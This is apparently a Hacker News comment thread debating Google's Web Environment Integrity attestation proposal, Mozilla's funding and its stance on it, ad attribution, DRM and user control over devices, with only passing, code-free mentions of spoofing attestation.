I was replying to a comment asking why Mozilla supports Interoperable Private Attribution (IPA). None of what I said should be taken as support for Web Integrity, which is cancer.
Quick googling confirms 50%+ of revenue came from Google 5-10 years ago, but couldn't find more recent data.
If Google is Mozilla's primary revenue source (especially if it's the majority), then Google effectively controls Mozilla via the leverage it has to pull Mozilla's largest revenue source.
Edit: Also raises the question, what company or organization should be developing browsers? A browser is something everyone expects to be free, but a browser is by no means free to develop, operate and maintain. For-profit browser companies (like Brave) would be forced to monetize the browser (like Brave tried to do with BAT crypto tokens, ads on the new tab page, etc)
It's just that this description is describing an "attack" that is just how attestation works. If you have a problem with attestation, talk about that problem, calling it "an attack" does nothing.
I'm actually against the proposal, too - although I see the merits. The ability to have servers authenticate clients based on the context of that client is amazing - it would seriously improve security if done right. But I personally believe that this should be done through the Device Policy extension exclusively, as it is already done there today, and that the extension should be opened and standardized.
In fact, I believe Google should be forced to do so.
There's some nuance there, too.
It's "turned beige", in part, because people refused to use it while it was still "white". Mozilla has had to make the tough calculation of whether to be pure with zero users and therefore zero good impact, or to be beige to try to get some of these fickle users back and maybe have SOME good impact.
So, basically, people aren't satisfied when Mozilla is pure/idealist, and they aren't satisfied when it's compromising/pragmatic ("If they do that, I might as well keep using Chrome!").
I'm not letting Mozilla off the hook, or giving my blessing for every single decision that's been made. But, there's probably some utility to us taking the view of "just shut up and use Firefox" for the next N years.
Firefox's usage dropping from about 30% down to likely less than 3% today, with almost no mobile usage, should be seen as a severe failure.
This failure isn't just about the product's uptake, too. It's also about the Firefox developers losing meaningful influence over the way the web evolves.
Website owners get protected from an ever increasing amount of malicious content. Now nearly impossible to detect thanks to LLMs. In theory you should be able to see the appeal that has.
I mean, Chrome (including Chromium, IIRC) literally collects and ships a bunch of tracking data to Google THE FIRST FUCKING TIME YOU LAUNCH THE APPLICATION.
Context matters. If Firefox did the Pocket nonsense in an environment where we had multiple decent free (as in freedom) browsers, then I'd grab my pitchfork. As it stands, I just can't feel the righteous indignation your comment is trying to rouse. It's truly NOTHING compared to the other options.
Tracking me harder isn't going to make those sites go away.
It sure is not. But I do believe we should have a legal right to own our own hardware, in every sense.
It's also about the loss of trust.
That particular incident, for example, was completely unnecessary. It involved a significant display of unbelievably poor judgment, and a total lack of foresight. It shouldn't have happened.
The fact that it did happen, despite it being such an obviously bad idea, raised a lot of questions and doubt.
It causes people to wonder what other incidents, which could potentially be far worse, might happen in the future.
It's remembered years later because it involved such a major loss of trust for so many people.
1. Instead of needing 100 passwords, which increases the chance of users just choosing something and repeating it, you have 1 password.
2. Similarly, instead of needing 2FA on 100 sites they can just have 2FA on their SSO. In fact, the other sites don't even need to support 2FA - you get that "for free" with SSO.
3. SSO providers implement auth really well. They make it smooth, as in "I don't have to reauth when it's obviously me" and safe, as in "that might not be a valid auth, let's get them to 2fa again".
Of course, if you have a password manager then (1) is not a problem. But SSO is a lot simpler for users.
Just wondering just how expensive it really is to rip the key out (or to have access to the tools to do it)
The opposition listed here is mostly misguided. For example, there is ~0% chance Google breaks "screen readers" or "assistive technologies" with Web Integrity. Saying that they would break seems like a bad faith argument to me.
Fundamentally this is about DRM and whether or not you think it should be allowed. I believe optional DRM for web applications would be good for developers and users of the apps. It would be bad for most other entities (crawlers, scrapers, criminals, etc). So I am in favor of it.
We may all end up stuck using a German VPN so we can still use ad blockers.
There's been speculation for a long time that the real reason Google pays for that is to keep Mozilla afloat and stave off antitrust investigations related to Chrome.
That may have changed with other browsers coming out, although almost all of them are based on Chromium. IANAL, have no idea whether or not someone can be a "competitor" if they're using largely the same source.
If it's true that Google is mostly paying for antitrust avoidance and that something like Edge isn't a "competitor", Mozilla has substantial leverage. Mozilla just needs to be cheaper than an antitrust investigation and potential loss of that case. I would imagine that's not hard to do, that sounds expensive.
The pitch of modern advertising certainly seems to be 'more personalised ads are the only way to be effective'. And within that pitch, attribution is about finding out if the way an ad was personalized was indeed effective. But I am not sure I trust google and facebook when they claim "only personalized ads are effective".
I can't really recall any decisions made that were unpopular with existing users, but likely to lure new users in. Ads on new tabs doesn't seem like something that would bring new users in. Pocket doesn't either, since iirc you could install the extension in Chrome if you really wanted it.
Most of the controversies I remember were either to increase Mozilla's revenue, or boondoggles like their mobile OS. My major annoyance was that the increase in revenue seems like it was spent on boondoggles or weird, unrelated charity rather than going back into improving the browser.
I'm still also a Firefox user, but it's like 99% because ads are not their primary source of revenue rather than any remaining fondness towards Mozilla.
One option would potentially be to only allow positive assertions - ie: "You are up to date" not "you are not running this". TBH I think that would address a major concern for me.
Indeed
> what does that have to do with me or my private property? ... But the advertising platform has no business relationship with me
I am not convinced that you owe the advertising platform attribution. My original point was just that attribution is not about dragnet surveillance for personalizing ads. But I can try to argue why browsers should do attribution, just to interrogate the question.
Specifically, you have a business relation with whatever website you are going to that serves you ads. That website has a clear interest in helping their ad-platform attribute ads on their website. After all, that website depends on those ads for your income.
It is then within the prerogative of that website to effectively say I only want to serve my website to users who will cooperate with attribution. This request is not a request for mass surveillance, because attribution is limited in what it reveals about a person. So this request could be construed as reasonable.
Given that websites have a reasonable standing to make these demands, it is reasonable for a user-agent to be able to accept these demands. Since otherwise the user for which the user-agent is acting cannot visit the website they requested the user-agent display. Of course a user-agent should let you opt out, but then websites are within their rights of refusing you access.
So far, so reasonable (or at least not completely unreasonable).
The sticking point is of course that most websites do want attribution, but don't want to block people with older browsers. So they want users to agree to give them the attribution data without giving the users anything in return. At which point a user-agent has no more business cooperating with attribution on behalf of the user.
In that case, there remains an argument of "if we don't do attribution the entire web is worse off, so we solve the tragedy of the commons by 'making the right decision' in the defaults for the user-agent". But that argument is clearly unreasonable to me.
a) SSO has no financial cost. Hardware keys do.
b) SSO has been implemented and standard for years and is trivial for sites to support, hardware keys are much newer and are still rarely supported for authentication.
c) You can use hardware keys with SSO, which I'd recommend, and now you've gotten the benefits of both.
If pissing me off after they've gotten $100 out of me means they get three others to spend $100, it's much more valuable than having me as a repeat customer. If someone found a way to triple my monthly spend but it made me miserable, said company would inevitably do it. Because if they don't, someone will come in, and eat them alive.
Advertising is purposefully inflicted misery, on all of us. The CEO of TF1, a French TV channel, called his job "selling available brain time to advertisers". That is all you are to them, whether we're talking about Coca Cola or Joe's Snoe and Foe: they want your money, because they die without it. Every company is a parasitic organism, and advertising is currently the most efficient way to spread.
However, dollars are fungible. If you donate $500 to support MDN, that may replace $500 for MDN coming from revenue, which frees up $500 to go into something else, like a C-Suite's pocket, or Pocket or whatever. So while your dollars go where you said, it still enables whatever you didn't like. OTOH, if you donate $50B to support MDN, that's a bit different; it certainly frees up whatever money was going to support MDN before, but there wasn't $50B of MDN expense, so the excess beyond the needs of MDN doesn't go anywhere.
[1] https://appleinsider.com/articles/12/07/25/apple_kills_windo...
I strongly disagree. Being disabled doesn't mean that you should be able to bypass the security of any system.
Also proposals like this help reduce the amount of captchas disabled users get meaning that they may have a better experience using the web if this proposal is accepted.
Mozilla has opposed Google many times, and is doing so again in the very link you are commenting on. Mozilla is not completely free from economic realities, but we are definitely not controlled by Google.
(Disclaimer: I'm working for Mozilla as an SRE.)
It's remembered now only by a very small, though vocal, minority.
I still think the approach is harmful overall.
The idea that I must be "vouched for" by a "trusted third party" by providing extensive details about my system, in order for my browser to send a HTTP request is in direct opposition to privacy and my interests.
That it's being proposed by a company that owes its entire existence to web crawling is ironic.
It turns the web from an open platform into one where the big players have complete control over which devices and software are permitted.
* I can actually run Google Pay because the original SafetyNet API was software backed. So I can spoof a signature from an old device that didn't support hardware attestation. In particular my Pixel 4a claims to be a Nexus 5 so that Google's servers don't expect a hardware signature. But I'm sure that the clock is ticking until these apps (or Google globally) stop considering software backed validation acceptable. I'm quite sure that this Web Integrity API will be hardware backed from the start.
The solution is diversity and using browsers that respect users. Chrome only has the power to push this API because they own most of the market.
All valid concerns, but why post about them on the internet? Especially when it's nothing concrete--you used the words "questions", "doubts", and "might happen"? If someone is taking the effort to post FUD (literally) about Mozilla and "trust", why the hell aren't they using that same effort to post about Google or Microsoft and "trust"? Aren't those obviously much bigger problems?
Again, it's not wrong, per se, but I feel like it's bordering on some kind of astroturfing for people to complain about the fucking Mr. Robot non-story that happened years ago when TFA is about Mozilla at least signalling the right thing while Google is trying to be overtly evil YET AGAIN. I can actually type "Fuck Google" faster than I can type "Mr. Robot", so I'd have to have some kind of weird agenda or priorities to bring up Firefox's Mr. Robot thing.
But, also, bringing money in is proxy enough for being able to do "good" for whatever definition we'd like to use. So, money or users, I think my general point about compromising their ideals for pragmatism is still valid (not necessarily true or correct, but it's an argument that can potentially be made).
Just a nit, "...that website depends on those ads for their income," not mine.
But yes, you're correct. And I do, in fact, aggressively block ads and the trackers/spyware/malware that goes with them.
And website owners are well within their rights to block me from viewing their site if (when, actually) I refuse to view their ads -- a point I've made in perhaps a half-dozen comments here on HN just in the past 12 months or so.
And I'm fine with that. For exactly the same reasons I gave for not wanting anything to do with ads/trackers/spyware running on my private property -- a site is the website owner's private property and they should be able to "charge a cover fee" (i.e., require that I view ads) to view the content of that site.
But WEI doesn't change that dynamic even a little. Rather, it forces me to give up control of my private property and privacy whether I want to do so or not.
I'd add that the "benefit" here isn't giving website owners the option to block me if I don't wish to view the ads run on their site -- they can already do that without WEI. In fact, some sites already do so. The only "benefit" AFAICT is that the ad platforms would now have enormously more information (in that they can now track me everywhere with a cryptographic signature regardless of any steps I might take to protect my privacy) to validate ad impressions and reporting metrics for the advertisers.
The result is that website owners have the same capability they've always had, but now I'm forced to subsidize some of the richest companies in the world with my electricity, CPU cycles, data, network bandwidth, browsing history, and likely my PII.
That's what I object to.
> In that case, there remains an argument of "if we don't do attribution the entire web is worse off, so we solve the tragedy of the commons by 'making the right decision' in the defaults for the user-agent". But that argument is clearly unreasonable to me.
Yes, it is unreasonable. I take great pains (I never log in/create accounts on any Google properties, block trackers and "analytics," self-host my email and content I wish to share in the Internet, etc., etc., etc.) to maintain at least a semblance of privacy, which is already a time/cost sink for me.
And these rapacious scumbags want me to jump through more hoops and run their code on my systems just so they can charge advertisers more for shit I don't want anyway? I'll say it again: Fuck. That. Noise.
tl;dr: Websites can already (and I support their ability to do so) block me (or anyone else) who runs an ad blocker from viewing their site. As such, the only folks that will have new capabilities/benefits from WEI are ad platforms and advertisers. With whom I have no relationship whatsoever and don't want their spyware to execute on my private property.
We don't have to be OK with it, but it seems inevitable that everything is just going to shit. Starting with smartphones. That's why my current smartphone will be my last one. The cost/benefit of them is no longer favorable.
I think that the web itself will be the next casualty.
There is no perfect option right now, and Mozilla will never be that perfect option because they are human and at least three people working there probably want to make some money.
So yeah, let's just keep making them irrelevant so in ten years I won't have a choice and be FORCED to use the browser that says ad blocking is stealing and spoofing your user agent is a violation of the CFAA and all this other blatantly user hostile shit.
It's such clear whataboutism, to have ANYTHING to hold against the only web browser that isn't actively controlled by the people with billions of dollars a year incentive to actually harm how you use the web.
"Firefox displayed a pop-up ad for Mozilla VPN over an unrelated page" (>>36077360 )
"Mozilla stops Firefox fullscreen VPN ads after user outrage" (>>36085642 )
That's another incident that just shouldn't have ever happened to begin with, in my opinion.
If you were selling a towel, you wouldn't put restrictions on someone wetting it and using it for hand to hand combat, would you?
And more directly yes I would want exactly what you're describing to be possible. We do this with alcohol so that rubbing alcohol can be sold at a reasonable price.
https://stackoverflow.com/questions/39533/how-to-identify-th...
I've used Firefox as my primary browser since it was Phoenix. Before that I used Netscape Communicator. It's not hard and I'm not missing out on anything.
Correct, but only in the sense that everyone should have the right to bypass attestation checks, not just disabled users.
> proposals like this help reduce the amount of captchas disabled users get
Citation needed. Chrome's implementation of this API ties directly into the Play Integrity API. I am skeptical that style of attestation will have any measurable impact on the ability to automate requests from an Android phone, and I am skeptical that websites will actually reduce captchas rather than just add attestation requirements alongside them.
Even if it did reduce captchas (which to be clear, it probably won't) disability accommodation should not be conditional. Low vision and low mobility users who run custom ROMs also deserve to access the web. If the level of captchas that are thrown in front of low vision users are problematic or inaccessible, that's a conversation we need to have about captchas more generally. It's not an excuse to restrict those users' autonomy over their computers.
But as it comes to the urgent matter of stopping this proposal in its tracks, switching browsers won't do it.
It requires other methods of immediate protest.
I don't think big websites will block every VM (especially since Microsoft has some kind of super secure browser implementation that uses virtualisation). You may need to make KVM fake HyperV, though.
They killed Weave (aka Sync 1.0; which was somewhat weird but simple enough to comprehend, reimplement and self-host), replacing it with an NIH-reeking over-engineered abomination that's the very antithesis of standard, open or public. Most people just ignored it as "that's Mozilla own infrastructure, they don't have to make it open, design it well, think of others, or anything else". I could not.
They tried to push a fundamentally flawed Persona/BrowserID standard that continued the trend to remove users from their "own" identities while claiming it's a pro-user pro-privacy move. I can see the logic, but I'm of firm opinion that it would've done more harm than good. I'm glad the project died without gaining any traction and WebAuthn (which has its issues, but where users are the source of their identities) took over. That's what BrowserID should've been, but Mozilla just went with the flow and refused or failed to fight for identity ownership.
It's things like those that made me regret using Firefox (but again, everything else is worse), not some home page sponsored links. That's where they stopped differing from the rest for me. Mozilla used to be a beacon of doing things right even if it was challenging, fighting for a better web. And they became just another software company, that put their glorious past on all the ads (how they're so pro-everything good) while failing to live up to those high standards.
They had a user agent, but they butchered it and made it just a browser.
----
It's worth considering that the examples that come up over and over again when people try to defend this proposal are a strong reason to believe that Google is lying or being naive when it says that the proposal won't eventually impact extensions or the ability to inspect 3rd-party code.
Because OS-level restrictions that ignore extensions and runtime modifications to websites and scriptable browsers won't help with any of these problems. And if advocates are willing to so quickly say today, "there's LLM spam, so sure, lock down the OS", they are also going to say in the future, "there's still LLM spam, the problem is worse than ever, lock down the extensions."
If you believe that blocking bots justifies attacking user agency, there's no reason to stop at blocking users from rooting their phones. The actual impactful attacks on user agency for blocking bots would be to block website inspection and website modification.
I'm trying to figure out how to balance assuming the best and treating every comment as if it's an individual argument, while also not being completely naive to the fact that a nontrivial number of the people making these arguments are very often blatantly pro-DRM and are asking me to just pretend that they're not. It's definitely not everyone, but...
Sure, the analog loophole (or analog input loophole) will remain. But it's times more difficult than what is possible at this point in time.
> And if advocates are willing to so quickly say today, "there's LLM spam, so sure, lock down the OS", they are also going to say in the future, "there's still LLM spam, the problem is worse than ever, lock down the extensions."
There's always going to be spam, just like there's always going to be ways around DRM. The difficulty changes over time. Up to the person to decide if it's good or bad.
> If you believe that blocking bots justifies attacking user agency, there's no reason to stop at blocking users from rooting their phones.
No one has stopped there, SafetyNet already does that.
I disagree, I don't think whether or not you can root your phone has any real impact on how hard it is to automate a request. I don't think this is the same as the analog loophole, I think it's going after a different area entirely from where most attacks are coming from.
> No one has stopped there, SafetyNet already does that.
What I mean is that SafetyNet blocks custom ROMs, rooting, etc... and I'm seeing comments saying that's all that the spec is interested in, it's not going to target extensions or code inspection. I don't think there's any reason to be confident of that, I think it's very likely that this spec evolves to target browser extensions. Because I don't think blocking people from rooting their phones will make an observable difference in the amount of LLM spam that websites get.
I find device farms way harder to pull off than a bash curl script, to be honest.
> I think it's very likely that this spec evolves to target browser extensions.
Absolutely, it very literally tries to guarantee integrity.
> Because I don't think blocking people from rooting their phones will make an observable difference in the amount of LLM spam that websites get.
I do think it would reduce the amount of abuse that's not very sophisticated. If that's worth the rest...
They sell the attack to business partners like Netflix and Spotify.
Effectively, they are selling the end users' liberty (ability to run arbitrary software, including for example, a cracked ad-free version of the Spotify app) to those business partners.
In sales-speak, this is framed as "effective Digital Rights Management", with "Rights" meaning "copyright enforcement". Critically, DRM is not a viable methodology until you provide it this attack surface.
It's also worth noting that YouTube is one of those business partners, and both Android and YouTube are owned by the same corporation: Alphabet.
I feel like you're potentially overcomplicating that? What I'm getting at is that:
A) You can basically build the equivalent of a bash curl script pretty easily if individual browsers aren't blocked (which Google says it doesn't want to do, but... that's my point, they will). Guaranteeing OS integrity doesn't matter unless you go on to restrict which browsers can run and weed out the efficient headless browsers. If any headless browser gets attestation support (and I've had proponents try to tell me that headless browsers will be supported) then that's likely game over for attestation as a bot detector.
B) You can build mostly the equivalent of a bash curl script inside of a webextension (or honestly, not even, you can make requests in a loop automated within your browser's dev-tools). You don't need to leave the monitor or anything hooked up and you don't need to do anything particularly fancy and you don't need to emulate user input or build a complicated farm. Your web browser is a terminal with all of the capabilities of Bash and more.
My instinct is that any website that was vulnerable to a quick and easy bash script before is going to be just as vulnerable to a `for` loop run inside the browser dev tools.
----
It's tricky to talk about because the actual answer is what you say: ("absolutely, it very literally tries to guarantee integrity") -- that attestation will involve significantly more restrictions than proponents are pretending it will impose. But if I take the proponents at face value, and if I believe that this is about guaranteeing OS integrity and blocking root and it's not going to block headless browsers or extensions -- in that world I don't think this necessitates setting up a bunch of device farms? I think it just means you run Headless Chromium or Firefox, maybe with a remote debugger if you want to be fancy, and then you have it spam requests. Bear in mind that this will be on desktop as well; it's not only phones that would be sending attestation signals. Desktop Chromium and Firefox are incredibly easy to script.
Maybe it makes that slightly more expensive since you have to actually run a browser, but I don't think you need a rack of phones and I'm not sure that the compute cost of running a browser can be considered prohibitive? Maybe I'm underestimating the margin that bot farms operate at and forcing them to run a browser would be enough to drive some out of business. But I kind of suspect you just use one of the desktop browsers that has attestation and write your "bash" script equivalent inside of that browser and everything works mostly the same.
Am I missing something? It doesn't seem like that big of a deal whether or not you can use curl.
And the only real way to get around that is for some websites to turn off the ability to have the browser arbitrarily execute code with full access to browser/page APIs whenever the user hits F12.
What it does do is afford the major players total control over which devices and individuals are allowed to access the web.
Relative to their current position of already owning the hardware?
> They sell the attack to business partners like Netflix and Spotify.
I don't see how they're "selling" anything. Web Integrity requires no money to change hands. If implemented, Netflix + Spotify would owe Google nothing.
Yes, in terms of buildings. But I see as many RedBox kiosks around as ever.
No fear, there.
No need for all those other things.
It's the lack of foresight and the lack of good judgment that I don't see getting fixed.
Both of those incidents should have been completely avoidable with even the most minimal of forethought.
I don't think that there's "a strong anti-Mozilla bias" here, as you put it earlier. The people affected by that incident, and by others, were probably among the most ardent Firefox supporters. After all, they were still using it long after so many others had already moved to Chrome.
Loss of trust is something that isn't easily forgotten, and it's a relevant factor worthy of bringing up in discussion.
> You may need to make KVM fake HyperV, though.
Not even techies are farting around with virtual machines and hoping their fake virtualization tricks don't break this week when they have important things to do, much less 99.999% of planet earth. They might however be willing to press one button that perceptively from the user standpoint switches their screen to a different desktop that happens to be running on a different machine. The interface to this feature would be simple enough they wouldn't have to care to understand it.
User's mental model: press button and "special" browser pops up full screen where I can bank/spend money. Press button again and it goes back to whatever they were doing.
Were you expecting only responses of praise for Mozilla, that users have been heard on WEI and therefore everyone can move on? Mozilla has invested resources together with Meta into developing the IPA proposal that also prioritises the needs of advertisers over users. The problem that IPA seeks to solve is:
"Advertisers need accurate reporting about how their ad campaigns are performing. Currently, businesses use data about the people who viewed their ads and bought their products to determine ‘return on ad spend’. But the ecosystem is moving towards more privacy and less personal data sharing."[1]
In Mozilla's response on WEI they've reiterated a commitment to working on solutions to the "invalid traffic" (e.g. ad click fraud) problem, a commitment which necessarily requires user needs to be suppressed. "Detecting fraud and invalid traffic is a challenging problem that we're interested in helping address."
Mozilla's response on IPA is therefore directly relevant to the discussion of public backlash for advertiser needs being prioritised over user needs. Mozilla is demonstrating inconsistency with RFC8890[2] and the priority of constituencies from the W3C Web Platform Design Principles[3] and numerous Ethical Web Principles[4]. Whilst these aren't adopted standards, they are a reflection of values of contributors to these standards organisations.
A further error of your framing is assuming WEI and IPA proposals can be meaningfully discussed in isolation of each other. With such framing, there is an avoidance of discussion of the combined impact of proposals if they were implemented together, or whether proposals such as IPA still make sense to pursue without WEI (or future equivalent proposal).
[1] https://docs.google.com/presentation/d/1NpQz0Wm73eEKw24V7B0y...
[2] https://www.rfc-editor.org/rfc/rfc8890.html
[3] https://www.w3.org/TR/design-principles/#priority-of-constit...
[4] https://www.w3.org/TR/ethical-web-principles/#control, https://www.w3.org/TR/ethical-web-principles/#multi, https://www.w3.org/TR/ethical-web-principles/#render
Having you spend money on a product you end up liking is positive for both parties of that transaction. Imagine it's a book you like, and you recommend it to others - who then buy it too to read it. Or a song you get others to hear. That's a happy customer of an arbitrary product. Does the author or artist know who you are personally? Of course not, but they didn't need to for them to care about their customers and make something that they enjoyed.
I suspect those are mostly different groups. And my personal take is that Mozilla did indeed make that calculation... and proceeded to sacrifice the die-hard core userbase in order to get wider appeal, but they managed to not actually get the wider audience to buy in either, leaving them with nothing.
If I could/had to pay/donate for it - I'd gladly do, but it's virtually impossible.
I know people want convenience. Anyone interested in convenience will just use Windows or macOS. They won't need to mess with VMs. This whole problem is only an issue for the small percentage of the population that wants to use their own weird operating systems, browsers, or addons.
If the need arises, someone will make a user friendly tool to do all this. Cassowary can do it today after following a step by step guide, they can also add their Web Integrity patches to those steps if they need to.
If you, as a user, want to have a special button that makes banking work without needing to know how or why, stick with proprietary operating systems. Linux isn't user friendly enough to accomplish this and it probably won't be for a while. The same is true if you want to watch your HD/4K streaming content without a huge struggle.
It's a non-story because you had to opt-in to Firefox's "experiments" feature to get the extension pushed to you. Opting in to the experiments feature is *literally* granting permission for Mozilla to change the behavior of your Firefox browser remotely in between official releases. So, Mozilla had your permission to change your browser. I simply will not shed a tear for anyone who felt betrayed by something they signed up for.
And, by the way, I was also "affected" by the Mr. Robot thing because I also opted in to the experiments feature.
Furthermore, the extension did nothing harmful. It didn't even collect any data as far as I know. You know why Mozilla pushed an extension that didn't even collect any data instead of one that does? Because they were acting in a trustworthy way!
Sure, it was a faux pas. Mozilla thought they could be cute the same way a lot of old school FLOSSy, hackery, software would include amusing Easter eggs and jokes. It was inappropriate and didn't land well for a variety of reasons, but there was no reason to lose trust in Mozilla at the time, and there's *certainly* no reason to even bring it up today, years later, when just about every other tech company and computer product is trying their damnedest to spy on you, sell your data, prevent you from having root control of your devices, and squeeze subscription money out of you.
Again, Chrome starts tracking you the instant you launch it for the first time. Microsoft tracks you when you log in to Windows and occasionally re-enables tracking features that you've disabled. Mozilla pushed a silly "fun" extension to users who opted in that didn't collect any data nor make Mozilla any money.
This discussion is nonsense. If you truly don't trust Mozilla after the harmless Mr. Robot extension was pushed to you after you chose to allow them to modify your browser remotely, then go ahead and stop using Firefox- I don't care. But please stop spreading FUD.
Has there ever been a case of an underdog company/product actually gaining market share by becoming less different than the market leader? It always seems like a mistake from the outside, to me. I feel like an underdog is more likely to succeed by actually being different and attracting people who would prefer those differences. Why would anyone change from what they're currently using to an alternative that is almost exactly the same?
So many people recommend it, but I've been iffy on using Brave. Thanks for giving me a little insight on your choices and reasoning behind it.
That said, I think income from Firefox's default search engine pretty much dwarfs any income that could potentially be gained from donations/buy-to-support.
US:
- https://www.ftc.gov/enforcement/report-antitrust-violation
- antitrust@ftc.gov
EU:
- https://competition-policy.ec.europa.eu/antitrust/contact_en
- comp-greffe-antitrust@ec.europa.eu
UK:
- https://www.gov.uk/guidance/tell-the-cma-about-a-competition...
- general.enquiries@cma.gov.uk
India:
- https://www.cci.gov.in/antitrust/
- https://www.cci.gov.in/filing/atd
Canada:
- https://www.competitionbureau.gc.ca/eic/site/cb-bc.nsf/frm-e...
I agree that it is convenient to be able to see each ad information, but that doesn't mean that it should be this way.
DRM is the tool that guarantees money will change hands. Without it, there is nothing but a social (legal) threat to prevent people copying and distributing copyrighted content for free.
Forcing users to run the DRM-infected version of an app creates an incentive for Netflix and Spotify to participate on the Android platform; which in turn strengthens Android's position, and the Google Play Store as a market.
This incentive goes both ways for YouTube, because it is owned by Alphabet.
> If implemented, Netflix + Spotify would owe Google nothing.
Yes, but that's not the point. Google wants Netflix and Spotify to have Android apps. Netflix and Spotify want DRM infecting their apps. Without this system in place, users can disinfect the Spotify app, and listen to music without paying Spotify money (or watching ads to pay them indirectly).
Without providing the environment for functional DRM, Netflix and Spotify can simply refuse to make Android apps. That would be a pretty weak threat, except that YouTube wants the same thing; and that incentivizes Android to play ball.
Those apps already exist. Don't you think that kind of undermines your entire point?